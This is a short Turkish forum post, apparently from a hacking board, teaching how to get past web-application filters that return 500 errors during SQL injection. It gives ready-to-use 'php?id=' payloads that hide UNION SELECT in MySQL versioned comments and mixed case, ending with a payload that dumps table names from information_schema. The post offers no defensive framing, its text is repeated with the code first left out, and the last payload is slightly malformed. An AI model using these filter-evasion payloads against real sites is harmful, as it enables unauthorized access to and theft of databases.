- 17 Mar 2016
- 629
- 1
SQL İNJECTİN BYPASS YÖNTEMİ ( 500 İNTERNAL SERVER ERROR) 2;
Arkadaşlar daha yeniki konumda bahsettiğimiz üzere "union select" yerlerine farklı karakterler kullandığımız taktirde sistemi bypass edip başarılı olmuş
olacağız fakat peki yine hala site 500 interrnal server error diyorsa ? şimdi 2.ci bypass yöntemimiz olan karakter girmeyi göstereceğim.
"/*!union*/ /*!select*/ 1,2,3,4,5,6,7,8,9" bir önceki komutumuz buydu arkadaşlar şimdi buna bir farklılık katarak siteyi bypass etmeye çalışacağız.
Şimdi uygulamak istediğimiz yerlere 5 karakterli bir rakam atacağız genellikle 50000 atanır arkadaşlar yani şöyle olur ;
yapıldığı taktirde sistem normale dönmüş olarak ekrana istediğimiz vurgular yansayacaktır.
Peki yine bypass olmadıysa ne yapacağız arkadaşlar bir önceki komutumuz da 5 karakterli rakam da atadık fakat yine de inatla sistem bypass olmuyor.
Şimdiki bypass yönteminde vurguldağımız "union select" yerlerini büyüklü,küçüklü yazacağız yani şöyle;
yapıldığı taktirde sistem normale dönüp istediğimizi vurgulamaış olacağız arkadaşlar.
komutuyla istediğimiz verilere ulaşmış olacağız arkadaşlar..
Bu konumda buraya kadar. Vesselam arkadaşlar..
Arkadaşlar daha yeniki konumda bahsettiğimiz üzere "union select" yerlerine farklı karakterler kullandığımız taktirde sistemi bypass edip başarılı olmuş
olacağız fakat peki yine hala site 500 interrnal server error diyorsa ? şimdi 2.ci bypass yöntemimiz olan karakter girmeyi göstereceğim.
"/*!union*/ /*!select*/ 1,2,3,4,5,6,7,8,9" bir önceki komutumuz buydu arkadaşlar şimdi buna bir farklılık katarak siteyi bypass etmeye çalışacağız.
Şimdi uygulamak istediğimiz yerlere 5 karakterli bir rakam atacağız genellikle 50000 atanır arkadaşlar yani şöyle olur ;
Kod:
"php?id=-1 /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7,8,9"
Peki yine bypass olmadıysa ne yapacağız arkadaşlar bir önceki komutumuz da 5 karakterli rakam da atadık fakat yine de inatla sistem bypass olmuyor.
Şimdiki bypass yönteminde vurguldağımız "union select" yerlerini büyüklü,küçüklü yazacağız yani şöyle;
Kod:
"php?id=-1 /*!50000Unİon*/ /*!50000SeLecT*/ 1,2,3,4,5,6,7,8,9"
Kod:
"php?id=-1 /*!50000Unİon*/ /*!50000SeLecT*/ 1,2,3,group_concat(table_name,5,6,7,8,9 from information_schema.tables where table_schema=database()"
Bu konumda buraya kadar. Vesselam arkadaşlar..
Son düzenleme: